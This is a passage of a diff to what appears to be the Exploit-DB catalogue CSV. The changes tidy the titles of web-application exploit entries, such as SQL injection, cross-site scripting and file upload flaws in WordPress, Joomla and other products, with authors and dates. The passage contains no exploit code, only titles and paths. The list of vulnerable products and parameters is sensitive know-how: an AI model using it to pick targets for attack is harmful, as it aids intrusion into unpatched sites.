Inclusion",2012-06-03,KedAns-Dz,php,webapps,0 37816,platforms/multiple/webapps/37816.txt,"Cisco Unified Communications Manager - Multiple Vulnerabilities",2015-08-18,"Bernhard Mueller",multiple,webapps,0 37815,platforms/php/webapps/37815.txt,"vBulletin < 4.2.2 - Memcache Remote Code Execution",2015-08-18,"Joshua Rogers",php,webapps,80 39249,platforms/php/webapps/39249.txt,"WeBid - Multiple Cross-Site Scripting / LDAP Injection Vulnerabilities",2014-07-10,"Govind Singh",php,webapps,0 @@ -36114,7 +36115,7 @@ id,file,description,date,author,platform,type,port 37371,platforms/php/webapps/37371.php,"WordPress Plugin Picturesurf Gallery - 'upload.php' Arbitrary File Upload",2012-06-03,"Sammy FORGIT",php,webapps,0 37372,platforms/java/webapps/37372.html,"BMC Identity Management - Cross-Site Request Forgery",2012-06-11,"Travis Lee",java,webapps,0 37373,platforms/php/webapps/37373.php,"WordPress Plugin Contus Video Gallery - 'upload1.php' Arbitrary File Upload",2012-06-12,"Sammy FORGIT",php,webapps,0 -37374,platforms/php/webapps/37374.txt,"Joomla! Component com_alphacontent - 'limitstart' Parameter SQL Injection",2012-06-10,xDarkSton3x,php,webapps,0 +37374,platforms/php/webapps/37374.txt,"Joomla! Component com_alphacontent - 'limitstart' SQL Injection",2012-06-10,xDarkSton3x,php,webapps,0 37375,platforms/php/webapps/37375.php,"Joomla! Component Joomsport - SQL Injection / Arbitrary File Upload",2012-06-11,KedAns-Dz,php,webapps,0 37376,platforms/php/webapps/37376.php,"XOOPS Cube PROJECT FileManager - 'xupload.php' Arbitrary File Upload",2012-06-12,KedAns-Dz,php,webapps,0 37377,platforms/php/webapps/37377.php,"WordPress Plugin HD FLV Player - 'uploadVideo.php' Arbitrary File Upload",2012-06-13,"Sammy FORGIT",php,webapps,0 @@ -36133,7 +36134,7 @@ id,file,description,date,author,platform,type,port 37398,platforms/php/webapps/37398.php,"Zimplit CMS 3.0 - Local File Inclusion / Arbitrary File Upload",2012-06-13,KedAns-Dz,php,webapps,0 37399,platforms/php/webapps/37399.php,"WordPress Plugin Evarisk - 'uploadPhotoApres.php' Arbitrary File Upload",2012-01-14,"Sammy FORGIT",php,webapps,0 37403,platforms/php/webapps/37403.php,"WordPress Plugin Invit0r - 'ofc_upload_image.php' Arbitrary File Upload",2012-06-14,"Sammy FORGIT",php,webapps,0 -37404,platforms/php/webapps/37404.txt,"MediaWiki 1.x - 'uselang' Parameter Cross-Site Scripting",2012-06-17,anonymous,php,webapps,0 +37404,platforms/php/webapps/37404.txt,"MediaWiki 1.x - 'uselang' Cross-Site Scripting",2012-06-17,anonymous,php,webapps,0 37406,platforms/php/webapps/37406.php,"WordPress Plugin Zingiri Web Shop 2.4.3 - 'uploadfilexd.php' Arbitrary File Upload",2012-06-14,"Sammy FORGIT",php,webapps,0 37407,platforms/php/webapps/37407.txt,"ADICO - 'index.php' Script SQL Injection",2012-06-15,"Ibrahim El-Sayed",php,webapps,0 37408,platforms/php/webapps/37408.txt,"Simple Forum PHP - Multiple SQL Injections",2012-06-14,"Vulnerability Research Laboratory",php,webapps,0 @@ -36143,20 +36144,20 @@ id,file,description,date,author,platform,type,port 37412,platforms/php/webapps/37412.php,"Joomla! Component Maian Media - 'uploadhandler.php' Arbitrary File Upload",2012-06-16,"Sammy FORGIT",php,webapps,0 37413,platforms/php/webapps/37413.txt,"Joomla! Component JCal Pro Calendar - SQL Injection",2012-06-15,"Taurus Omar",php,webapps,0 37414,platforms/php/webapps/37414.txt,"Simple Document Management System 1.1.5 - Multiple SQL Injections",2012-06-16,JosS,php,webapps,0 -37415,platforms/php/webapps/37415.txt,"Webify Multiple Products - Multiple HTML Injection / Local File Inclusion",2012-06-16,snup,php,webapps,0 +37415,platforms/php/webapps/37415.txt,"Webify (Multiple Products) - Multiple HTML Injection / Local File Inclusions",2012-06-16,snup,php,webapps,0 37416,platforms/java/webapps/37416.txt,"Squiz CMS - Multiple Cross-Site Scripting / XML External Entity Injection Vulnerabilities",2012-06-14,"Nadeem Salim",java,webapps,0 37417,platforms/php/webapps/37417.php,"Multiple WordPress Themes - 'upload.php' Arbitrary File Upload",2012-06-18,"Sammy FORGIT",php,webapps,0 37418,platforms/php/webapps/37418.php,"WordPress Plugin LB Mixed Slideshow - 'upload.php' Arbitrary File Upload",2012-06-18,"Sammy FORGIT",php,webapps,0 -37419,platforms/php/webapps/37419.txt,"WordPress Plugin Wp-ImageZoom - 'file' Parameter Remote File Disclosure",2012-06-18,"Sammy FORGIT",php,webapps,0 +37419,platforms/php/webapps/37419.txt,"WordPress Plugin Wp-ImageZoom - 'file' Remote File Disclosure",2012-06-18,"Sammy FORGIT",php,webapps,0 37420,platforms/php/webapps/37420.txt,"VANA CMS - 'index.php' Script SQL Injection",2012-06-18,"Black Hat Group",php,webapps,0 37565,platforms/php/webapps/37565.txt,"Mahara 1.4.1 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-08-02,anonymous,php,webapps,0 -37497,platforms/php/webapps/37497.txt,"Flogr - 'tag' Parameter Multiple Cross-Site Scripting Vulnerabilities",2012-07-09,Nafsh,php,webapps,0 +37497,platforms/php/webapps/37497.txt,"Flogr - 'tag' Multiple Cross-Site Scripting Vulnerabilities",2012-07-09,Nafsh,php,webapps,0 37423,platforms/php/webapps/37423.txt,"DeDeCMS < 5.7-sp1 - Remote File Inclusion",2015-06-29,zise,php,webapps,0 37424,platforms/hardware/webapps/37424.py,"Huawei Home Gateway UPnP/1.0 IGD/1.00 - Password Disclosure",2015-06-29,"Fady Mohammed Osman",hardware,webapps,0 37425,platforms/hardware/webapps/37425.py,"Huawei Home Gateway UPnP/1.0 IGD/1.00 - Password Change",2015-06-29,"Fady Mohammed Osman",hardware,webapps,0 37430,platforms/php/webapps/37430.txt,"CMS Balitbang - Multiple HTML Injection / Cross-Site Scripting Vulnerabilities",2012-06-19,TheCyberNuxbie,php,webapps,0 37431,platforms/php/webapps/37431.php,"e107 Hupsi_fancybox Plugin - 'Uploadify.php' Arbitrary File Upload",2012-06-19,"Sammy FORGIT",php,webapps,0 -37432,platforms/php/webapps/37432.txt,"e107 Image Gallery Plugin - 'name' Parameter Remote File Disclosure",2012-06-19,"Sammy FORGIT",php,webapps,0 +37432,platforms/php/webapps/37432.txt,"e107 Image Gallery Plugin - 'name' Remote File Disclosure",2012-06-19,"Sammy FORGIT",php,webapps,0 37433,platforms/php/webapps/37433.txt,"AdaptCMS 2.0.2 - 'index.php' Script Cross-Site Scripting",2012-06-19,indoushka,php,webapps,0 37434,platforms/php/webapps/37434.txt,"e107 Filedownload Plugin - Arbitrary File Upload / Remote File Disclosure",2012-06-19,"Sammy FORGIT",php,webapps,0 37435,platforms/php/webapps/37435.txt,"web@all - Cross-Site Scripting",2012-06-20,"High-Tech Bridge",php,webapps,0 @@ -36166,7 +36167,7 @@ id,file,description,date,author,platform,type,port 37439,platforms/php/webapps/37439.txt,"Novius 5.0.1 - Multiple Vulnerabilities",2015-06-30,hyp3rlinx,php,webapps,80 37441,platforms/jsp/webapps/37441.txt,"WedgeOS 4.0.4 - Multiple Vulnerabilities",2015-06-30,Security-Assessment.com,jsp,webapps,0 37442,platforms/linux/webapps/37442.txt,"CollabNet Subversion Edge Management 4.0.11 - Local File Inclusion",2015-06-30,otr,linux,webapps,4434 -37443,platforms/php/webapps/37443.txt,"Joomla! Component com_szallasok - 'id' Parameter SQL Injection",2012-06-21,CoBRa_21,php,webapps,0 +37443,platforms/php/webapps/37443.txt,"Joomla! Component com_szallasok - 'id' SQL Injection",2012-06-21,CoBRa_21,php,webapps,0 37444,platforms/php/webapps/37444.txt,"Cotonti - 'admin.php' SQL Injection",2012-06-22,AkaStep,php,webapps,0 37445,platforms/php/webapps/37445.txt,"CMS Lokomedia - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-06-22,the_cyber_nuxbie,php,webapps,0 37446,platforms/php/webapps/37446.txt,"Fiyo CMS 2.0_1.9.1 - SQL Injection",2015-06-30,cfreer,php,webapps,80 @@ -36177,7 +36178,7 @@ id,file,description,date,author,platform,type,port 37452,platforms/php/webapps/37452.txt,"WordPress Plugin Flip Book - 'PHP.php' Arbitrary File Upload",2012-06-23,"Sammy FORGIT",php,webapps,0 37453,platforms/php/webapps/37453.php,"Drupal Module Drag & Drop Gallery 6.x-1.5 - 'upload.php' Arbitrary File Upload",2012-06-25,"Sammy FORGIT",php,webapps,0 37454,platforms/hardware/webapps/37454.txt,"D-Link DSP-W w110 v1.05b01 - Multiple Vulnerabilities",2015-07-01,DNO,hardware,webapps,0 -37499,platforms/php/webapps/37499.txt,"Phonalisa - Multiple HTML Injection / Cross-Site Scripting",2012-07-12,"Benjamin Kunz Mejri",php,webapps,0 +37499,platforms/php/webapps/37499.txt,"Phonalisa - Multiple HTML Injection / Cross-Site Scripting Vulnerabilities",2012-07-12,"Benjamin Kunz Mejri",php,webapps,0 37457,platforms/php/webapps/37457.html,"FCKEditor Core - 'Editor 'spellchecker.php'' Cross-Site Scripting",2012-06-25,"Emilio Pinna",php,webapps,0 37459,platforms/php/webapps/37459.txt,"Umapresence - Local File Inclusion / Arbitrary File Deletion",2012-06-25,"Sammy FORGIT",php,webapps,0 37460,platforms/php/webapps/37460.txt,"Schoolhos CMS - HTML Injection",2012-06-27,the_cyber_nuxbie,php,webapps,0 @@ -36187,21 +36188,21 @@ id,file,description,date,author,platform,type,port 37467,platforms/jsp/webapps/37467.txt,"TEMENOS T24 - Multiple Cross-Site Scripting Vulnerabilities",2012-06-28,"Rehan Ahmed",jsp,webapps,0 37468,platforms/php/webapps/37468.php,"JAKCMS PRO 2.2.6 - 'uploader.php' Arbitrary File Upload",2012-06-29,"Sammy FORGIT",php,webapps,0 37469,platforms/php/webapps/37469.txt,"LIOOSYS CMS - SQL Injection / Information Disclosure",2012-06-29,MustLive,php,webapps,0 -37470,platforms/multiple/webapps/37470.txt,"SWFupload - 'movieName' Parameter Cross-Site Scripting",2012-06-29,"Nathan Partlan",multiple,webapps,0 +37470,platforms/multiple/webapps/37470.txt,"SWFupload - 'movieName' Cross-Site Scripting",2012-06-29,"Nathan Partlan",multiple,webapps,0 37472,platforms/php/webapps/37472.php,"Getsimple CMS Items Manager Plugin - 'PHP.php' Arbitrary File Upload",2012-07-02,"Sammy FORGIT",php,webapps,0 40676,platforms/php/webapps/40676.txt,"My Little Forum 2.3.7 - Multiple Vulnerabilities",2016-11-01,"Ashiyane Digital Security Team",php,webapps,0 37474,platforms/php/webapps/37474.txt,"CuteNews 2.0.3 - Arbitrary File Upload",2015-07-03,T0x!c,php,webapps,80 37498,platforms/php/webapps/37498.txt,"Kajona - 'getAllPassedParams()' Multiple Cross-Site Scripting Vulnerabilities",2012-07-11,"High-Tech Bridge SA",php,webapps,0 37476,platforms/php/webapps/37476.txt,"PHP MBB - Cross-Site Scripting / SQL Injection",2012-07-03,TheCyberNuxbie,php,webapps,0 37479,platforms/php/webapps/37479.txt,"Classified Ads Script PHP - 'admin.php' Multiple SQL Injections",2012-07-04,snup,php,webapps,0 -37481,platforms/php/webapps/37481.txt,"WordPress Plugin SocialFit - 'msg' Parameter Cross-Site Scripting",2012-07-06,"Sammy FORGIT",php,webapps,0 -37482,platforms/php/webapps/37482.txt,"WordPress Plugin custom tables - 'key' Parameter Cross-Site Scripting",2012-07-03,"Sammy FORGIT",php,webapps,0 -37483,platforms/php/webapps/37483.txt,"WordPress Plugin church_admin - 'id' Parameter Cross-Site Scripting",2012-07-06,"Sammy FORGIT",php,webapps,0 +37481,platforms/php/webapps/37481.txt,"WordPress Plugin SocialFit - 'msg' Cross-Site Scripting",2012-07-06,"Sammy FORGIT",php,webapps,0 +37482,platforms/php/webapps/37482.txt,"WordPress Plugin custom tables - 'key' Cross-Site Scripting",2012-07-03,"Sammy FORGIT",php,webapps,0 +37483,platforms/php/webapps/37483.txt,"WordPress Plugin church_admin - 'id' Cross-Site Scripting",2012-07-06,"Sammy FORGIT",php,webapps,0 37484,platforms/php/webapps/37484.txt,"WordPress Plugin Knews Multilingual Newsletters - Cross-Site Scripting",2012-07-06,"Sammy FORGIT",php,webapps,0 -37485,platforms/php/webapps/37485.txt,"WordPress Plugin PHPFreeChat - 'url' Parameter Cross-Site Scripting",2012-07-05,"Sammy FORGIT",php,webapps,0 -37486,platforms/php/webapps/37486.txt,"sflog! - 'section' Parameter Local File Inclusion",2012-07-06,dun,php,webapps,0 -37488,platforms/asp/webapps/37488.txt,"WebsitePanel - 'ReturnUrl' Parameter URI Redirection",2012-07-09,"Anastasios Monachos",asp,webapps,0 -37489,platforms/php/webapps/37489.txt,"MGB - Multiple Cross-Site Scripting / SQL Injection",2012-07-09,"Stefan Schurtz",php,webapps,0 +37485,platforms/php/webapps/37485.txt,"WordPress Plugin PHPFreeChat - 'url' Cross-Site Scripting",2012-07-05,"Sammy FORGIT",php,webapps,0 +37486,platforms/php/webapps/37486.txt,"sflog! - 'section' Local File Inclusion",2012-07-06,dun,php,webapps,0 +37488,platforms/asp/webapps/37488.txt,"WebsitePanel - 'ReturnUrl' URI Redirection",2012-07-09,"Anastasios Monachos",asp,webapps,0 +37489,platforms/php/webapps/37489.txt,"MGB - Multiple Cross-Site Scripting / SQL Injections",2012-07-09,"Stefan Schurtz",php,webapps,0 37563,platforms/php/webapps/37563.html,"WordPress Plugin G-Lock Double Opt-in Manager - SQL Injection",2012-08-01,BEASTIAN,php,webapps,0 37492,platforms/ios/webapps/37492.txt,"WK UDID 1.0.1 iOS - Command Injection",2015-07-05,Vulnerability-Lab,ios,webapps,0 37534,platforms/php/webapps/37534.txt,"WordPress Plugin Easy2Map 1.24 - SQL Injection",2015-07-08,"Larry W. Cashdollar",php,webapps,80 @@ -36212,15 +36213,15 @@ id,file,description,date,author,platform,type,port 37503,platforms/php/webapps/37503.txt,"Event Calender PHP - Multiple Input Validation Vulnerabilities",2012-07-16,snup,php,webapps,0 37504,platforms/android/webapps/37504.py,"AirDroid - Unauthenticated Arbitrary File Upload",2015-07-06,"Parsa Adib",android,webapps,8888 37505,platforms/php/webapps/37505.txt,"Simple Machines 2.0.2 - Multiple HTML Injection Vulnerabilities",2012-07-16,"Benjamin Kunz Mejri",php,webapps,0 -37506,platforms/php/webapps/37506.php,"WordPress Plugin Post Recommendations - 'abspath' Parameter Remote File Inclusion",2012-07-16,"Sammy FORGIT",php,webapps,0 -37507,platforms/php/webapps/37507.txt,"web@all - 'name' Parameter Cross-Site Scripting",2012-07-16,"Sammy FORGIT",php,webapps,0 +37506,platforms/php/webapps/37506.php,"WordPress Plugin Post Recommendations - 'abspath' Remote File Inclusion",2012-07-16,"Sammy FORGIT",php,webapps,0 +37507,platforms/php/webapps/37507.txt,"web@all - 'name' Cross-Site Scripting",2012-07-16,"Sammy FORGIT",php,webapps,0 37508,platforms/php/webapps/37508.txt,"Rama Zeiten CMS - 'download.php' Remote File Disclosure",2012-07-16,"Sammy FORGIT",php,webapps,0 37509,platforms/php/webapps/37509.txt,"EmbryoCore CMS 1.03 - 'loadcss.php' Multiple Directory Traversal Vulnerabilities",2012-07-16,"Sammy FORGIT",php,webapps,0 37511,platforms/php/webapps/37511.txt,"AVA VoIP - Multiple Vulnerabilities",2012-07-17,"Ibrahim El-Sayed",php,webapps,0 37514,platforms/php/webapps/37514.txt,"WordPress Plugin ACF Frontend Display 2.0.5 - Arbitrary File Upload",2015-07-07,"TUNISIAN CYBER",php,webapps,80 37515,platforms/php/webapps/37515.txt,"phpLiteAdmin 1.1 - Multiple Vulnerabilities",2015-07-07,hyp3rlinx,php,webapps,80 37516,platforms/hardware/webapps/37516.txt,"D-Link DSL-2750u / DSL-2730u - Authenticated Local File Disclosure",2015-07-07,"SATHISH ARTHAR",hardware,webapps,0 -37519,platforms/php/webapps/37519.txt,"Joomla! Component com_hello - 'Controller' Parameter Local File Inclusion",2012-07-19,"AJAX Security Team",php,webapps,0 +37519,platforms/php/webapps/37519.txt,"Joomla! Component com_hello - 'Controller' Local File Inclusion",2012-07-19,"AJAX Security Team",php,webapps,0 37520,platforms/php/webapps/37520.txt,"Maian Survey - 'index.php' URI redirection / Local File Inclusion",2012-07-20,PuN!Sh3r,php,webapps,0 37521,platforms/php/webapps/37521.txt,"CodeIgniter 2.1 - 'xss_clean()' Filter Security Bypass",2012-07-19,"Krzysztof Kotowicz",php,webapps,0 37522,platforms/php/webapps/37522.txt,"WordPress Plugin chenpress - Arbitrary File Upload",2012-07-21,Am!r,php,webapps,0 @@ -36230,47 +36231,47 @@ id,file,description,date,author,platform,type,port 37621,platforms/windows/webapps/37621.txt,"Kaseya Virtual System Administrator - Multiple Vulnerabilities (1)",2015-07-15,"Pedro Ribeiro",windows,webapps,0 37530,platforms/php/webapps/37530.txt,"WordPress Plugin WP E-Commerce Shop Styling 2.5 - Arbitrary File Download",2015-07-08,"Larry W. Cashdollar",php,webapps,80 37531,platforms/hardware/webapps/37531.txt,"Grandstream GXV3275 < 1.0.3.30 - Multiple Vulnerabilities",2015-07-08,"David Jorm",hardware,webapps,0 -37532,platforms/hardware/webapps/37532.txt,"AirLive Multiple Products - OS Command Injection",2015-07-08,"Core Security",hardware,webapps,8080 +37532,platforms/hardware/webapps/37532.txt,"AirLive (Multiple Products) - OS Command Injection",2015-07-08,"Core Security",hardware,webapps,8080 37533,platforms/asp/webapps/37533.txt,"Orchard CMS 1.7.3/1.8.2/1.9.0 - Persistent Cross-Site Scripting",2015-07-08,"Paris Zoumpouloglou",asp,webapps,80 37537,platforms/php/webapps/37537.txt,"phpProfiles - Multiple Vulnerabilities",2012-07-24,L0n3ly-H34rT,php,webapps,0 -37540,platforms/php/webapps/37540.txt,"Joomla! Component Odudeprofile 2.8 - 'profession' Parameter SQL Injection",2012-07-25,"Daniel Barragan",php,webapps,0 +37540,platforms/php/webapps/37540.txt,"Joomla! Component Odudeprofile 2.8 - 'profession' SQL Injection",2012-07-25,"Daniel Barragan",php,webapps,0 37541,platforms/php/webapps/37541.txt,"tekno.Portal 0.1b - 'anket.php' SQL Injection",2012-07-25,Socket_0x03,php,webapps,0 -37544,platforms/php/webapps/37544.txt,"ocPortal 7.1.5 - 'redirect' Parameter URI redirection",2012-07-29,"Aung Khant",php,webapps,0 +37544,platforms/php/webapps/37544.txt,"ocPortal 7.1.5 - 'redirect' URI Redirection",2012-07-29,"Aung Khant",php,webapps,0 37547,platforms/php/webapps/37547.txt,"Scrutinizer 9.0.1.19899 - Multiple Cross-Site Scripting Vulnerabilities",2012-07-30,"Mario Ceballos",php,webapps,0 37548,platforms/php/webapps/37548.txt,"Scrutinizer 9.0.1.19899 - Arbitrary File Upload",2012-07-30,"Mario Ceballos",php,webapps,0 37549,platforms/cgi/webapps/37549.txt,"Scrutinizer 9.0.1.19899 - HTTP Authentication Bypass",2012-07-30,"Mario Ceballos",cgi,webapps,0 37550,platforms/jsp/webapps/37550.txt,"DataWatch Monarch Business Intelligence - Multiple Input Validation Vulnerabilities",2012-07-31,"Raymond Rizk",jsp,webapps,0 37551,platforms/php/webapps/37551.txt,"phpBB - Multiple SQL Injections",2012-07-28,HauntIT,php,webapps,0 -37552,platforms/php/webapps/37552.txt,"JW Player - 'playerready' Parameter Cross-Site Scripting",2012-07-29,MustLive,php,webapps,0 -37553,platforms/php/webapps/37553.txt,"eNdonesia - 'cid' Parameter SQL Injection",2012-07-29,Crim3R,php,webapps,0 +37552,platforms/php/webapps/37552.txt,"JW Player - 'playerready' Cross-Site Scripting",2012-07-29,MustLive,php,webapps,0 +37553,platforms/php/webapps/37553.txt,"eNdonesia - 'cid' SQL Injection",2012-07-29,Crim3R,php,webapps,0 37554,platforms/php/webapps/37554.txt,"Limny - 'index.php' Multiple SQL Injections",2012-07-31,L0n3ly-H34rT,php,webapps,0 37555,platforms/java/webapps/37555.txt,"ManageEngine Applications Manager - Multiple SQL Injections",2012-08-01,"Ibrahim El-Sayed",java,webapps,0 37556,platforms/php/webapps/37556.txt,"Distimo Monitor - Multiple Cross-Site Scripting Vulnerabilities",2012-08-01,"Benjamin Kunz Mejri",php,webapps,0 -37557,platforms/java/webapps/37557.txt,"ManageEngine Applications Manager - Multiple Cross-Site Scripting / SQL Injection",2012-08-01,"Ibrahim El-Sayed",java,webapps,0 +37557,platforms/java/webapps/37557.txt,"ManageEngine Applications Manager - Multiple Cross-Site Scripting / SQL Injections",2012-08-01,"Ibrahim El-Sayed",java,webapps,0 37559,platforms/php/webapps/37559.txt,"WordPress Plugin CP Image Store with Slideshow 1.0.5 - Arbitrary File Download",2015-07-10,"i0akiN SEC-LABORATORY",php,webapps,0 37560,platforms/php/webapps/37560.txt,"WordPress Plugin CP Multi View Event Calendar 1.1.7 - SQL Injection",2015-07-10,"i0akiN SEC-LABORATORY",php,webapps,0 37567,platforms/php/webapps/37567.txt,"tekno.Portal 0.1b - 'link.php' SQL Injection",2012-08-01,Socket_0x03,php,webapps,0 -37569,platforms/multiple/webapps/37569.txt,"ntop - 'arbfile' Parameter Cross-Site Scripting",2012-08-03,"Marcos Garcia",multiple,webapps,0 +37569,platforms/multiple/webapps/37569.txt,"ntop - 'arbfile' Cross-Site Scripting",2012-08-03,"Marcos Garcia",multiple,webapps,0 37570,platforms/multiple/webapps/37570.py,"Zenoss 3.2.1 - Remote Authenticated Command Execution",2012-07-30,"Brendan Coles",multiple,webapps,0 37571,platforms/multiple/webapps/37571.txt,"Zenoss 3.2.1 - Multiple Vulnerabilities",2012-07-30,"Brendan Coles",multiple,webapps,0 -37572,platforms/php/webapps/37572.txt,"Elefant CMS - 'id' Parameter Cross-Site Scripting",2012-08-03,PuN!Sh3r,php,webapps,0 +37572,platforms/php/webapps/37572.txt,"Elefant CMS - 'id' Cross-Site Scripting",2012-08-03,PuN!Sh3r,php,webapps,0 37573,platforms/multiple/webapps/37573.txt,"Worksforweb iAuto - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-08-06,"Benjamin Kunz Mejri",multiple,webapps,0 37575,platforms/php/webapps/37575.txt,"Joomla! Component com_photo - Multiple SQL Injections",2012-08-06,"Chokri Ben Achor",php,webapps,0 37577,platforms/asp/webapps/37577.txt,"PolarisCMS - 'WebForm_OnSubmit()' Cross-Site Scripting",2012-08-05,"Gjoko Krstic",asp,webapps,0 -37578,platforms/php/webapps/37578.txt,"Open Constructor - users/users.php keyword Parameter Cross-Site Scripting",2012-08-04,"Lorenzo Cantoni",php,webapps,0 -37579,platforms/php/webapps/37579.txt,"Open Constructor - data/file/edit.php result Parameter Cross-Site Scripting",2012-08-04,"Lorenzo Cantoni",php,webapps,0 -37580,platforms/php/webapps/37580.txt,"Open Constructor - confirm.php q Parameter Cross-Site Scripting",2012-08-04,"Lorenzo Cantoni",php,webapps,0 -37581,platforms/php/webapps/37581.txt,"Dir2web - system/src/dispatcher.php oid Parameter SQL Injection",2012-08-07,"Daniel Correa",php,webapps,0 -37582,platforms/php/webapps/37582.py,"Mibew Messenger 1.6.4 - 'threadid' Parameter SQL Injection",2012-08-05,"Ucha Gobejishvili",php,webapps,0 -37583,platforms/php/webapps/37583.txt,"YT-Videos Script - 'id' Parameter SQL Injection",2012-08-06,3spi0n,php,webapps,0 -37584,platforms/php/webapps/37584.txt,"TCExam 11.2.x - '/admin/code/tce_edit_answer.php' Multiple Parameter SQL Injection",2012-08-07,"Chris Cooper",php,webapps,0 -37585,platforms/php/webapps/37585.txt,"TCExam 11.2.x - '/admin/code/tce_edit_question.php subject_module_id' Parameter SQL Injection",2012-08-07,"Chris Cooper",php,webapps,0 +37578,platforms/php/webapps/37578.txt,"Open Constructor - 'users/users.php?keyword' Cross-Site Scripting",2012-08-04,"Lorenzo Cantoni",php,webapps,0 +37579,platforms/php/webapps/37579.txt,"Open Constructor - 'data/file/edit.php?result' Cross-Site Scripting",2012-08-04,"Lorenzo Cantoni",php,webapps,0 +37580,platforms/php/webapps/37580.txt,"Open Constructor - 'confirm.php?q' Cross-Site Scripting",2012-08-04,"Lorenzo Cantoni",php,webapps,0 +37581,platforms/php/webapps/37581.txt,"Dir2web - 'system/src/dispatcher.php?oid' SQL Injection",2012-08-07,"Daniel Correa",php,webapps,0 +37582,platforms/php/webapps/37582.py,"Mibew Messenger 1.6.4 - 'threadid' SQL Injection",2012-08-05,"Ucha Gobejishvili",php,webapps,0 +37583,platforms/php/webapps/37583.txt,"YT-Videos Script - 'id' SQL Injection",2012-08-06,3spi0n,php,webapps,0 +37584,platforms/php/webapps/37584.txt,"TCExam 11.2.x - '/admin/code/tce_edit_answer.php' Multiple SQL Injections",2012-08-07,"Chris Cooper",php,webapps,0 +37585,platforms/php/webapps/37585.txt,"TCExam 11.2.x - '/admin/code/tce_edit_question.php?subject_module_id' SQL Injection",2012-08-07,"Chris Cooper",php,webapps,0 37586,platforms/php/webapps/37586.php,"PBBoard - Authentication Bypass",2012-08-07,i-Hmx,php,webapps,0 -37587,platforms/php/webapps/37587.txt,"Getsimple - 'path' Parameter Local File Inclusion",2012-08-07,PuN!Sh3r,php,webapps,0 +37587,platforms/php/webapps/37587.txt,"Getsimple - 'path' Local File Inclusion",2012-08-07,PuN!Sh3r,php,webapps,0 37588,platforms/php/webapps/37588.txt,"phpSQLiteCMS - Multiple Vulnerabilities",2015-07-13,hyp3rlinx,php,webapps,80 37589,platforms/java/webapps/37589.txt,"ConcourseSuite - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities",2012-08-08,"Matthew Joyce",java,webapps,0 -37590,platforms/php/webapps/37590.txt,"phpList 2.10.18 - 'unconfirmed' Parameter Cross-Site Scripting",2012-08-08,"High-Tech Bridge SA",php,webapps,0 -37591,platforms/php/webapps/37591.php,"AraDown - 'id' Parameter SQL Injection",2012-08-08,G-B,php,webapps,0 +37590,platforms/php/webapps/37590.txt,"phpList 2.10.18 - 'unconfirmed' Cross-Site Scripting",2012-08-08,"High-Tech Bridge SA",php,webapps,0 +37591,platforms/php/webapps/37591.php,"AraDown - 'id' SQL Injection",2012-08-08,G-B,php,webapps,0 37592,platforms/php/webapps/37592.php,"FreiChat 9.6 - SQL Injection",2015-07-13,"Kacper Szurek",php,webapps,80 37594,platforms/php/webapps/37594.txt,"Arab Portal 3 - SQL Injection",2015-07-13,"ali ahmady",php,webapps,80 37595,platforms/php/webapps/37595.txt,"phpVibe - Arbitrary File Disclosure",2015-07-13,"ali ahmady",php,webapps,80 @@ -36283,9 +36284,9 @@ id,file,description,date,author,platform,type,port 37609,platforms/xml/webapps/37609.txt,"Pimcore CMS Build 3450 - Directory Traversal",2015-07-14,Portcullis,xml,webapps,0 37610,platforms/php/webapps/37610.txt,"sysPass 1.0.9 - SQL Injection",2015-07-14,"SySS GmbH",php,webapps,0 37613,platforms/php/webapps/37613.txt,"phpList 2.10.18 - 'index.php' SQL Injection",2012-08-08,"High-Tech Bridge SA",php,webapps,0 -37614,platforms/php/webapps/37614.txt,"PBBoard - 'index.php' Multiple Parameter SQL Injection",2012-08-08,"High-Tech Bridge",php,webapps,0 +37614,platforms/php/webapps/37614.txt,"PBBoard - 'index.php' Multiple SQL Injections",2012-08-08,"High-Tech Bridge",php,webapps,0 37615,platforms/php/webapps/37615.txt,"PBBoard - member_id Parameter Validation Password Manipulation",2012-08-08,"High-Tech Bridge",php,webapps,0 -37616,platforms/php/webapps/37616.txt,"PBBoard - admin.php xml_name Parameter Arbitrary PHP Code Execution",2012-08-08,"High-Tech Bridge",php,webapps,0 +37616,platforms/php/webapps/37616.txt,"PBBoard - 'admin.php?xml_name' Arbitrary PHP Code Execution",2012-08-08,"High-Tech Bridge",php,webapps,0 37617,platforms/php/webapps/37617.txt,"dirLIST 0.3.0 - Local File Inclusion",2012-08-08,L0n3ly-H34rT,php,webapps,0 37620,platforms/php/webapps/37620.txt,"Joomla! Component com_docman - Multiple Vulnerabilities",2015-07-15,"Hugo Santiago",php,webapps,80 37623,platforms/hardware/webapps/37623.txt,"15 TOTOLINK Router Models - Multiple Remote Code Execution Vulnerabilities",2015-07-16,"Pierre Kim",hardware,webapps,0 @@ -36300,8 +36301,8 @@ id,file,description,date,author,platform,type,port 37635,platforms/php/webapps/37635.txt,"GalaxyScripts Mini File Host and DaddyScripts Daddy's File Host - Local File Inclusion",2012-08-10,L0n3ly-H34rT,php,webapps,0 37636,platforms/php/webapps/37636.txt,"WordPress Theme ShopperPress - SQL Injection / Cross-Site Scripting",2012-08-02,"Benjamin Kunz Mejri",php,webapps,0 37637,platforms/php/webapps/37637.pl,"Elastix 2.2.0 - 'graph.php' Local File Inclusion",2012-08-17,cheki,php,webapps,0 -37638,platforms/cgi/webapps/37638.txt,"LISTSERV 16 - 'SHOWTPL' Parameter Cross-Site Scripting",2012-08-17,"Jose Carlos de Arriba",cgi,webapps,0 -37641,platforms/php/webapps/37641.txt,"JPM Article Blog Script 6 - 'tid' Parameter Cross-Site Scripting",2012-08-21,Mr.0c3aN,php,webapps,0 +37638,platforms/cgi/webapps/37638.txt,"LISTSERV 16 - 'SHOWTPL' Cross-Site Scripting",2012-08-17,"Jose Carlos de Arriba",cgi,webapps,0 +37641,platforms/php/webapps/37641.txt,"JPM Article Blog Script 6 - 'tid' Cross-Site Scripting",2012-08-21,Mr.0c3aN,php,webapps,0 37642,platforms/php/webapps/37642.txt,"SaltOS - 'download.php' Cross-Site Scripting",2012-08-18,"Stefan Schurtz",php,webapps,0 37643,platforms/php/webapps/37643.txt,"IBM Rational ClearQuest 8.0 - Multiple Vulnerabilities",2012-08-27,anonymous,php,webapps,0 37644,platforms/php/webapps/37644.txt,"Jara 1.6 - Multiple SQL Injections / Multiple Cross-Site Scripting Vulnerabilities",2012-08-22,"Canberk BOLAT",php,webapps,0 @@ -36309,35 +36310,35 @@ id,file,description,date,author,platform,type,port 